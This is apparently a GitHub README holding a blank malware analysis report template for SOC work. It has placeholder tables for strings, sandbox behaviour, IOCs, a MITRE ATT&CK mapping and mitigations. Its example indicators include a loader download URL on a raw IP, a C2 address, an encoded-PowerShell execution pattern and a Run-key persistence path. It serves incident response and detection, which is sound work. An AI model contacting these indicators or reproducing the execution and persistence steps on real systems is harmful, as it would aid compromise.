rsk-cyber/Malware-Investigation-Analysis

GitHub: rsk-cyber/Malware-Investigation-Analysis

Stars: 0 | Forks: 0

# {{Malware Sample Name}} – Malware Analysis Report **{{Brief description of the sample – e.g., "AsyncRAT trojan delivered via phishing email with fake invoice lure."}}** ## 📸 Screenshots ![Sample icon or properties](https://raw.githubusercontent.com/rsk-cyber/Malware-Investigation-Analysis/main/images/{{sample-icon.png}}) ![File properties](https://raw.githubusercontent.com/rsk-cyber/Malware-Investigation-Analysis/main/images/{{file-properties.png}}) ## 🔍 Static Analysis ### Strings (Interesting) | String | Relevance | |--------|-----------| | `{{C2 domain or IP}}` | Potential command & control | | `{{powershell -enc ...}}` | Encoded execution | | `{{Registry key path}}` | Persistence mechanism | | `{{Mutex name}}` | Anti‑sandbox / single instance | ### PE Headers (if applicable) | Field | Value | |-------|-------| | Entry Point | `{{0x...}}` | | Compile Timestamp | `{{YYYY-MM-DD}}` | | Sections (Name, Virtual Size, Entropy) | `.text`, `.rdata`, `.data` | | Imports | `{{kernel32.dll, user32.dll, etc.}}` | ### VirusTotal / MalwareBazaar Results ![VirusTotal detection summary](https://raw.githubusercontent.com/rsk-cyber/Malware-Investigation-Analysis/main/images/{{vt-summary.png}}) | Vendor | Detection Name | |--------|----------------| | {{e.g., CrowdStrike}} | {{trojan.msil/scarsi}} | | {{...}} | {{...}} | ## 🧪 Dynamic Analysis (Sandbox Detonation) **Sandbox used:** {{Joe Sandbox / Cuckoo / ANY.RUN / CAPE}} **Report link:** {{URL}} - **Processes created:** `{{D41tYapPDr.exe}}` → `{{powershell.exe -enc ...}}` → `{{conhost.exe}}` - **Process injection:** {{Code injected into suspended process / hollowing detected}} - **File system changes:** Dropped `{{%AppData%\Roaming\Vlevqbxvsx\Kjcrsvxp.exe}}` - **Registry changes:** Created `{{HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Kjcrsvxp}}` - **Network activity:** HTTP GET to `{{http://107.175.247.199/loader/install.exe}}` C2 beacon to `{{107.175.247.199:443}}` - **Persistence mechanism:** {{Registry run key / scheduled task / startup folder}} - **Anti-analysis techniques detected:** {{Check for sandbox, debugger, VM, sleep obfuscation}} ![Process tree](https://raw.githubusercontent.com/rsk-cyber/Malware-Investigation-Analysis/main/images/{{process-tree.png}}) ![Registry changes](https://raw.githubusercontent.com/rsk-cyber/Malware-Investigation-Analysis/main/images/{{registry-changes.png}}) ![Network traffic](https://raw.githubusercontent.com/rsk-cyber/Malware-Investigation-Analysis/main/images/{{network-traffic.png}}) ## 🧠 Indicators of Compromise (IOCs) | Type | Indicator | |------|-----------| | **MD5** | `{{34793C6520DCF3C6130DC031FA640C71}}` | | **SHA-1** | `{{...}}` | | **SHA-256** | `{{...}}` | | **IPv4** | `{{107.175.247.199}}` | | **Domain** | `{{malicious[.]top}}` | | **URL** | `{{http://107.175.247.199/loader/install.exe}}` | | **Registry Key** | `{{HKCU\...\Run\Kjcrsvxp}}` | | **File Path** | `{{%AppData%\Roaming\Vlevqbxvsx\Kjcrsvxp.exe}}` | | **Mutex** | `{{Global\...}}` | ## 🎯 MITRE ATT&CK Mapping | Tactic | Technique ID | Technique Name | Observed Behavior | |--------|--------------|----------------|--------------------| | Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | `powershell -enc` executed | | Persistence | T1547.001 | Registry Run Keys / Startup Folder | Run key created | | Defense Evasion | T1027 | Obfuscated Files or Information | Base64 encoded PowerShell | | Defense Evasion | T1055 | Process Injection | Injected into suspended process | | Discovery | T1082 | System Information Discovery | Queries computer name, OS version | | Command & Control | T1071.001 | Application Layer Protocol: Web Protocols | HTTP beacon to C2 | | Exfiltration | T1041 | Exfiltration Over C2 Channel | Data sent via C2 | ![MITRE ATT&CK Navigator](https://raw.githubusercontent.com/rsk-cyber/Malware-Investigation-Analysis/main/images/{{mitre-layer.png}}) ## 🛡️ Mitigation Recommendations - [ ] **Block IOCs** – Add all hashes to endpoint AV/EDR, block C2 IP/domain at firewall, quarantine dropped files. - [ ] **Scope the environment** – Search entire network for IOCs: file hash, registry key, process names, network connections to `{{107.175.247.199}}`. - [ ] **Remove persistence** – Delete registry run key `{{HKCU\...\Run\Kjcrsvxp}}` and kill any related processes. - [ ] **Email gateway** – Block sender infrastructure and any emails containing the malicious URL. - [ ] **User awareness** – Train users to recognize phishing lures (e.g., fake invoices) even when sender appears legitimate. - [ ] **EDR hunting** – Query for `-enc` flag in PowerShell command lines and processes creating suspended child processes. ## 📈 Lessons Learned & Reflection - **What worked well:** {{Sandbox quickly identified injection and persistence; VirusTotal gave high detection rate.}} - **What could be improved:** {{Automate decoding of PowerShell -enc strings; integrate C2 IP blocking into SOAR.}} - **Key takeaway for SOC:** {{Even simple-looking executables can be sophisticated RATs. Always sandbox and check registry changes.}} ## 🔗 References & Tools Used - **Sandbox:** {{Joe Sandbox / ANY.RUN / CAPE}} - **VirusTotal:** {{link}} - **Malpedia / Triage:** {{link}} - **CyberChef:** {{link}} - **PEStudio / Detect It Easy:** {{link}} - **ProcMon / Wireshark:** {{link}} *Template last updated: {{YYYY-MM-DD}}*